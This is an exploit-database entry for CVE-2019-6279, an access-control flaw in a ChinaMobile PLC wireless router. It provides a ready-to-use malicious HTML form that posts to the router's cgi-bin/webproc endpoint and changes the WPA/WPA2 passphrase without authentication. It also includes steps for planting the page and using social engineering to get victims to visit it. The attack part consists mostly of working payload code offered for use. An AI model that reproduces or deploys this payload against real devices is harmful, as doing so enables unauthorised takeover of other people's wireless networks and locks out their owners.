[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PLC Wireless Router GPN2.4P21-C-CN Incorrect Access Control Vulnerability

Author
Kumar Saurav
Risk
[
Security Risk Low
]
0day-ID
0day-ID-32041
Category
web applications
Date add
23-01-2019
CVE
CVE-2019-6279
Platform
hardware
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control
# Exploit Author: Kumar Saurav
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6279

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware
W2001EN-00 have an Incorrect Access Control vulnerability via the cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.

#Reproduction Steps:

Step 1: Building a malicious html web page

Step 2: Attacker's wants to change the wireless security (WPA/WPA2) key to "PSWDmatlo331#@!" (in my case)

Step 3:
<html>
<body>
  <form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
    <input type="text" name="sessionid" value="2a39a09e">
    <input type="text" name="language" value="en_us">
    <input type="text" name="sys_UserName" value="admin">
    <input type="text" name="var:menu" value="setup">
    <input type="text" name="var:page" value="wireless">
    <input type="text" name="var:subpage" value="wlsecurity">
    <input type="text" name="var:errorpage" value="wlsecurity">
    <input type="text" name="getpage" value="html/index.html">
    <input type="text" name="errorpage" value="html/index.html">
    <input type="text" name="var:arrayid" value="0">
    <input type="text" name="obj-action" value="set">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
    <input type="submit" value="Send">
  </form>
</body>
</html>

Step 4: save this as Incorrect_Access_Control.html

Step 5: Planting this malicious web page (Incorrect_Access_Control.html) that are 
  likely to be visited by the victim's (by social engineering) or any user connected in the Access Point (AP)
        will have to visit this page or any attacker connected in the AP will trigger this exploit

Step 6: After execution of above exploit, wireless security (WPA/WPA2) key will change!!

Note: This vulnerability allowing an attacker to reproduce without login.

#  0day.today [2024-12-24]  #